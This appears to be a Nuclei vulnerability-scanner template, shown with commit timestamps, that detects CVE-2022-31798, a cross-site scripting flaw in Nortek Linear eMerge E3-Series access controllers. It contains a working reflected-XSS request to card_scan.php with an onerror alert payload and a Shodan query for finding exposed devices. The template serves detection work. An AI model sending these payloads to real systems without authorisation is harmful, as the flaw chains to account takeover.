2022-08-12 11:31:04 +00:00
id : CVE-2022-31798
info :
2022-09-09 17:34:37 +00:00
name : Nortek Linear eMerge E3-Series - Cross-Site Scripting
2022-08-12 11:31:04 +00:00
author : ritikchaddha
2022-10-10 19:40:25 +00:00
severity : medium
2022-08-12 11:31:04 +00:00
description : |
2022-10-10 19:22:59 +00:00
There is a local session fixation vulnerability that, when chained with cross-site scripting, leads to account take over of admin or a lower privileged user.
2023-09-06 11:59:08 +00:00
remediation : |
Apply the latest security patches or updates provided by the vendor to fix the XSS vulnerability in the Nortek Linear eMerge E3-Series.
2022-08-12 11:31:04 +00:00
reference :
- https://packetstormsecurity.com/files/167992/
2022-08-26 08:13:09 +00:00
- http://packetstormsecurity.com/files/167992/Nortek-Linear-eMerge-E3-Series-Account-Takeover.html
2022-10-10 19:22:59 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-31798
2023-07-11 19:49:27 +00:00
- https://eg.linkedin.com/in/omar-1-hashem
- https://gist.github.com/omarhashem123/bccdcec70ab7e8f00519d56ea2e3fd79
2022-08-29 13:55:23 +00:00
classification :
2022-10-10 19:40:25 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
2022-10-10 19:22:59 +00:00
cve-id : CVE-2022-31798
2023-08-31 11:46:18 +00:00
cwe-id : CWE-384
2023-10-14 11:27:55 +00:00
epss-score : 0.0012
2023-10-17 17:52:26 +00:00
epss-percentile : 0.45948
2023-09-06 11:59:08 +00:00
cpe : cpe:2.3:o:nortekcontrol:emerge_e3_firmware:*:*:*:*:*:*:*:*
2022-08-12 11:31:04 +00:00
metadata :
2023-06-04 08:13:42 +00:00
verified : true
2023-09-06 11:59:08 +00:00
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : nortekcontrol
product : emerge_e3_firmware
2023-09-06 11:59:08 +00:00
shodan-query : http.title:"eMerge"
2022-08-27 04:41:18 +00:00
tags : cve2022,emerge,nortek,xss,packetstorm,cve
2022-08-12 11:31:04 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-08-12 11:31:04 +00:00
- method : GET
path :
2022-08-13 00:01:54 +00:00
- '{{BaseURL}}/card_scan.php?No=0000&ReaderNo=0000&CardFormatNo=%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E'
2022-08-12 11:31:04 +00:00
matchers-condition : and
matchers :
- type : word
part : body
words :
2022-08-13 00:01:54 +00:00
- ',"CardFormatNo":"<img src=x onerror=alert(document.domain)>"}'
2022-08-12 11:31:04 +00:00
- type : word
part : header
words :
- text/html
- type : status
status :
- 200